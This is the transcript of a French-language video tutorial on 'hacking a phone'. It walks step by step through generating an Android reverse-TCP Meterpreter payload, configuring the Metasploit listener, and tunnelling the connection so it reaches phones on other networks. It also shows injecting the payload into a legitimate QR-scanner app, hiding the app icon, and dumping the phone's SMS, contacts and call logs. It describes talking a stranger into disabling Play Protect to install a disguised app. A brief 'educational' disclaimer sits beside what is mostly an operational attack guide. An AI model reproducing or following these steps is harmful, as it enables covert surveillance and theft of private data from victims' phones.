Comment hacker un téléphone? Si tu as cliqué sur cette vidéo, c'est sûrement une question que tu t'es déjà posée. Et laisse-moi te dire, cette vidéo, c'est la meilleure vidéo que tu verras sur ce sujet-là. Ici, webcam list, tu peux voir, il y a 2 caméras. Donc, je te conseille de couper toutes distractions et de te concentrer pendant ces 10 prochaines minutes parce que cette vidéo n'est pas très bien structurée et tu dois la regarder du début jusqu'à la fin pour avoir toutes les infos nécessaires. Cette vidéo a pour but éducatif. Testez ça sur des machines virtuelles ou bien sur vos propres téléphones. Bon, si vous commettez des actes illégaux avec les informations de cette vidéo, je ne suis pas responsable de vos actes. Et je précise que regardez la vidéo du début jusqu'à la fin. Ne venez pas en commentaire me poser des questions, or que j'ai déjà parlé de ça dans la vidéo. Tout cela étant dit, let's go. Pour hacker un téléphone, tu peux exploiter 2 types de failles. La faille humaine, encore appelée le social engineering. La faille technique liée au logiciel ou au matériel. La différence entre les deux est extrêmement simple. Une faille technique est un problème dans le système ou dans un logiciel, tandis qu'une faille humaine repose sur les erreurs ou la négligence d'une personne. Par exemple, cliquer sur un lien malveillant dans un mail, utiliser des mots de passe faibles. Voici un exemple qui illustre parfaitement la faille humaine. Aujourd'hui, une personne m'a écrit pour recevoir Aviator Predictor. C'est une application qui permet de prédire Aviator. On a discuté et je lui ai envoyé le fichier. Et j'ai précisé que pendant l'installation, son téléphone va dire que c'est une application malveillante. Donc, il doit désactiver Play Protector pour pouvoir installer l'application correctement. Et il a accepté. Pour tous ceux qui ne connaissent pas Play Protector, c'est lui qui joue le rôle d'antivirus sur le téléphone. Donc, s'il y avait injecté une porte dérobée, c'est-à-dire qu'un virus dans l'application, il allait prendre le contrôle total comme ça de son téléphone. Les outils qui permettent de créer un payload ou d'injecter une porte dérobée dans une application déjà existante sont nombreux, mais je vais vous citer quelques-uns de ces outils que j'ai testés. On a Defatra, Androra, Evil Droid. Bref, je vais vous mettre le lien de leur dépôt GitHub en description si vous voulez les installer et les essayer. Maintenant, on va voir un exemple pratique. Maintenant, on va créer le fichier qui va nous permettre de prendre le contrôle du téléphone. Pour ça, on va utiliser Defatra. C'est un outil extrêmement simple à utiliser. On va lancer le terminal. Je vais zoomer un peu. Je vais me déplacer dans le dossier où j'ai installé Defatra. CD. Maintenant, je vais le lancer. Sudo Defatra. C'est bon, on va patienter un peu. Comme tu le vois, il propose des options très intéressantes. Mais l'option qui nous intéresse ici, c'est la première option. Bref, vu que le payload que je vais générer, je vais le tester sur mon téléphone. Donc je ne vais pas de complications. Je vais générer un payload simple. Restez bien jusqu'à la fin. Je vais vous présenter les autres options à la fin de la vidéo. On va choisir un. Ici, on va choisir la troisième option. Parce que mon téléphone cible, c'est un téléphone Android. Ici, je vais mettre mon adresse IP locale. Parce que mon téléphone et mon PC sont connectés à un même réseau. Pour le port, je vais choisir 1, 2, 3, 4. Pour le nom, je vais mettre 0D. Ici, je vais choisir la troisième option parce que je vais un reverse TCP. On va patienter un peu. Bon, il a fini de générer le payload. Si on va dans le dossier, on va dans documents parce que c'est dans le dossier documents, il stocke mes fichiers générés. Bon, maintenant qu'il a créé le fichier, pour envoyer ça sur le téléphone, c'est extrêmement simple. Je vais créer un serveur. C'est-à-dire que je vais exposer ce dossier-là localement. C'est-à-dire que je vais exposer ça sur mon réseau. Ce qui va me permettre d'accéder à ce dossier-là depuis mon téléphone. Pour faire ça, c'est extrêmement simple. Je vais faire clic droit. Open terminal. Je vais agrandir un peu. Si je fais ls, tu peux voir le fichier. 02.apk. Je vais lancer le serveur sur le port 90. Je vais lancer. C'est bon. Maintenant, je vais faire une capture d'écran de mon téléphone et je vais vous afficher ça ici. Bon, j'espère que vous voyez ça. Maintenant, je vais taper mon adresse IP 2.90. Et je vais lancer. Tu peux voir en haut le fichier 02.apk. Je vais cliquer dessus. Je vais l'enregistrer. Comme je télécharge ça depuis internet, on me dit que le fichier peut être potentiellement dangereux. Je vais télécharger quand même. Maintenant, je vais cliquer sur ouvrir. Installer. À la fin de la vidéo, je vais vous montrer une option simple qui va vous permettre de cacher le payload dans une application. Maintenant, on va cliquer sur ouvrir. On va accepter toutes les autorisations. On va cliquer sur continuer. Bon, maintenant qu'on a exécuté le payload sur le téléphone, on va lancer un listener pour recevoir la connexion. C'est-à-dire qu'on va lancer une écoute sur le port 1, 2, 3, 4 pour recevoir une connexion. Pour ça, c'est simple. J'ai déjà lancé MSF Console. On va configurer le listener. Je vais tout vous montrer. C'est bon. Use exploit multi Android. C'est bon. Maintenant, set payload Android non, c'est Android /meterpreter bar reverse TCP. C'est bon. Je vais lancer set lhost
Pour l'adresse IP, je vais mettre 0.0.0.0. Il va écouter sur toutes les interfaces. Pour le port 7, R port 1, 2, 3, 4. Maintenant, je vais lancer Run. On va patienter un peu. C'est bon. Une session m'interprète s'est lancée. À partir de cette session, on peut faire tout ce qu'on veut sur le téléphone. Pour voir toutes les commandes qu'on peut taper à distance sur le téléphone, on va taper help. Voici toutes les commandes qu'on peut taper à distance sur le téléphone. Pour la première commande, on va taper cette commande-là, Since Info, pour récupérer les informations sur le téléphone. Ici, on peut voir c'est Android 11. Ici, on peut voir le système de langage FR. Bref, on a un certain nombre d'informations sur le téléphone. Maintenant, on va passer aux choses sérieuses. Une petite pause pour vous dire de liker et de vous abonner pour ne pas manquer les prochaines vidéos. C'est gratuit, mais moi, ça me soutient énormément. Bref, merci à tous ceux qui vont le faire. La prochaine commande qu'on va taper, c'est cette commande-là. Pour cacher l'icône de l'application sur le téléphone, il y a une application, c'est-à-dire que le payload qu'on a installé sur le téléphone, il y a ça en haut. Cette commande va nous permettre de masquer l'icône de l'application. Pour faire ça, c'est simple. Je vais copier la commande. Comme tu viens de voir, l'icône de l'application a complètement disparu. Tout ça, ce sont des commandes que tu peux taper à distance sur le téléphone. Par exemple, ici, Webcam List. Tu peux voir la liste de webcam. Ici, tu peux voir, il y a deux caméras. La caméra de face et la caméra de derrière. C'est-à-dire que selfie et la caméra de derrière. AP liste. Tu vas voir la liste des applications. On te montre toutes les applications que la personne a installées sur son téléphone. Bref, maintenant on va voir des commandes très intéressantes. Par exemple, comment récupérer les SMS de la personne. Donc SMS. On va lancer. Il va aller récupérer tous les SMS de mon téléphone et il va envoyer ça sur le Kali Linux. C'est bon. Si on va dans le dossier, dans Kali, tu peux voir le fichier là ici. Ce sont les SMS de mon téléphone ça. Si j'ai cliqué deux fois, tu vois mes SMS. Évidemment que je vais tout masquer. C'est possible aussi de récupérer la liste des numéros de téléphone. Dump contact. Avec Dump Call, tu peux récupérer la liste des appels aussi. Avec Send SMS, tu peux envoyer les SMS à la place de la personne. Ici, on va récupérer la liste des contacts. Comme tu le vois, il a déjà récupéré ça. Si on va dans 0D, tu vois, il y a une nouvelle liste qui s'est rajoutée. C'est la liste de mes contacts. Bref, il y a beaucoup d'autres choses que tu peux faire à distance sur un téléphone. Moi, je vais m'arrêter ici et je vais vous laisser essayer par vous-même. Bon, maintenant, je vais vous montrer comment injecter directement le virus dans une application déjà existante. Et je vais vous montrer comment faire quand ton téléphone de test n'est pas sur le même réseau que toi. Il y a plusieurs services qui permettent de résoudre ce problème-là. Il y a Ngrok, Serveo, Local Tunnel. Mais dans cette vidéo, je vais vous parler de Porma.io et je vais vous montrer comment l'utiliser. Tu vas aller dans ton navigateur, tu vas taper Porma.io. Tu vas arriver sur une interface comme ça. Tu vas cliquer sur ce bouton-là pour t'inscrire. Après l'inscription, tu vas atterrir sur une interface comme ça. Tu vas cliquer sur Create New Configuration. Ici, tu vas choisir TCP. Et après, tu vas descendre en bas, tu vas cliquer sur Generate. Bref, après, tu vas cliquer sur Download. Maintenant, tu vas aller dans Mapping. Tu vas cliquer sur Create New. Ici, tu vas choisir le port que tu veux. Moi, je vais choisir 80-80. Bon. Et tu vas cliquer sur Create. C'est bon, on a créé notre tunnel TCP. Tu vas lancer ton terminal et tu vas installer OpenVPN. C'est très important. Moi, j'ai déjà installé OpenVPN, mais si toi, tu n'as pas installé, tu peux l'installer avec cette commande-là. C'est bon. Maintenant, tu vas aller dans ton gestionnaire de fichiers. Tu vas aller dans Download. Tu vas voir les fichiers qu'on a téléchargés. Tu vas les déplacer dans... Moi, je l'ai mis dans 0D. Je vais retirer ça. Bref, si je fais ls, il est ici. Maintenant, tu vas l'exécuter. Bon, tu vas taper sudo openvpn 2-config. Maintenant, tu vas mettre le nom du fichier. C'est bon. Et tu vas lancer. C'est bon. Tu peux voir ici. Maintenant, je vais vous montrer comment utiliser le tunnel TCP dans la création du payload. Pour créer le payload, je vais utiliser des FATRA. Je vais le lancer et on se retrouve après. C'est bon, il s'est lancé correctement. On va choisir la 5e option. Elle permet d'injecter directement le payload dans une application. Parce que tu prends une application, tu injectes directement le payload dans cette application. On va choisir 5. Ici, on te demande de mettre ton adresse IP. Ce qu'on va faire, c'est que tu vas retourner sur le site. Tu vas copier ça. Tu vas copier ça là seulement.
et tu vas coller, tu vas lancer. Pour le port, c'est exactement la même chose. Tu vas aller copier ce port là. C'est important de mettre le port que tu as choisi pendant la création du tunnel. Bon, ici on te demande de mettre le chemin de l'application dans lequel on va injecter le payload. Moi j'ai déjà téléchargé une application hier. J'ai téléchargé cette application. Elle permet de scanner les QR codes. Donc c'est pour la démonstration de cette vidéo. Je vais copier. Non, je vais renommer. Je vais copier le nom. Maintenant je vais mettre ça dans le chemin et je vais copier tout ça. Et je vais mettre ça. Bon, arrivé ici, on va choisir la troisième option pour obtenir un reverse TCP3. C'est bon. Bon, ici, je vais choisir la première option. Ici, on te demande est-ce qu'on laisse les permissions, parce que les permissions que l'application d'origine a sur le téléphone, ou bien il va fusionner avec le payload et il va demander beaucoup plus d'autorisation. Moi, je vous conseille de prendre l'option numéro 2. Bref, je ne vais pas aller au bout parce que c'est une démonstration. Bon, maintenant, je vais vous montrer comment configurer correctement le listener. Pour mettre en place le listener, c'est extrêmement simple. Tu vas commencer par use exploit multi-handler. Ensuite, set payload interpreter reverse TCP. C'est très important de préciser Android ici. Et ensuite, pour LHost, je te conseille de mettre 0.0.0.0 pour écouter sur toutes les interfaces. Et pour le port, tu dois mettre 80-80 parce que c'est sur le port 80-80 port.map.io va rediriger la connexion. Maintenant, tu vas taper exploit ou bien run. Moi, je vais couper comme ça. Pour tous ceux qui veulent apprendre le hacking et ils ne savent pas par où commencer, j'ai fait un guide complet. Je vais vous mettre le lien en description. Ce guide regroupe toutes les ressources gratuites que vous pouvez utiliser pour apprendre. Il y a déjà 26 personnes qui ont déjà téléchargé le guide et ça les a aidés à se lancer ou bien à progresser vite. Bref, foncez, il y a le lien en description. Ce PDF là m'a pris 3 jours à construire. Ce n'est pas un truc que j'ai fait avec ChatGPT. Tous ceux qui ont acheté peuvent témoigner. Ce n'est pas un truc fait par ChatGPT. Foncez, il y a le lien en description.